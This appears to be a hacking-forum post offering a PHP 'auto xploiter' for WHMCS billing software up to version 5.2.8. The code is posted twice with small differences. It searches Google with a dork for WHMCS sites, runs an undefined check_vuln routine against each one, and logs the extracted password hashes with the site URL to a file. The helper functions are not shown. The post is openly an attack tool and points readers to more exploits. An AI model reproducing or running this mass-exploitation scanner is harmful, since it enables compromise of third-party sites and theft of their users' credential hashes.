8 Years of Service
100%
WHMCS Auto Xploiter (0day)
[For WHMCS ver. <= 5.2.8]
Google Dork: <?phpif(isset($_POST['dork']{0})) {$file = fopen("WMCS-Hashes.txt","a");echo '
Scanning has been started... Good luck!
';letItBy();for($googlePage = 1; $googlePage <= 50; $googlePage++) {$googleResult = google_that($_POST['dork'], $googlePage);if(!$googleResult) {echo 'Finished scanning.';fclose($file);break;}for($victim = 0; $victim < sizeof($googleResult); $victim++){$result = check_vuln($googleResult[$victim]['unescapedUrl']);$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);if($result != "Fail!") {$hashes = "";foreach ($result as $record) {$hashes = $hashes . str_replace(':::::','',$record) . "\n";}$sep = "========================================================\n";$data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";fwrite($file,$data);echo "
Successfully Xploited...";echo '';echo "
";}else {echo '';echo "{$googleResult[$victim]['titleNoFormatting']} - Failed!";echo "\n
";}letItBy();}}echo '
';}?>
Coded by: g00n | Skype: t3hg00n
For more tools/scripts/exploits/etc.
visit
[For WHMCS ver. <= 5.2.8]
Google Dork: <?phpif(isset($_POST['dork']{0})) {$file = fopen("WMCS-Hashes.txt","a");echo '
Scanning has been started... Good luck!

';letItBy();for($googlePage = 1; $googlePage <= 50; $googlePage++) {$googleResult = google_that($_POST['dork'], $googlePage);if(!$googleResult) {echo 'Finished scanning.';fclose($file);break;}for($victim = 0; $victim < sizeof($googleResult); $victim++){$result = check_vuln($googleResult[$victim]['unescapedUrl']);$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);if($result != "Fail!") {$hashes = "";foreach ($result as $record) {$hashes = $hashes . str_replace(':::::','',$record) . "\n";}$sep = "========================================================\n";$data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";fwrite($file,$data);echo "
Successfully Xploited...";echo '';echo "
Code:
" . $data . "
";}letItBy();}}echo '
';}?>
Coded by: g00n | Skype: t3hg00n
For more tools/scripts/exploits/etc.
visit
This link is hidden for visitors. Please Log in or register now.
Last edited by a moderator: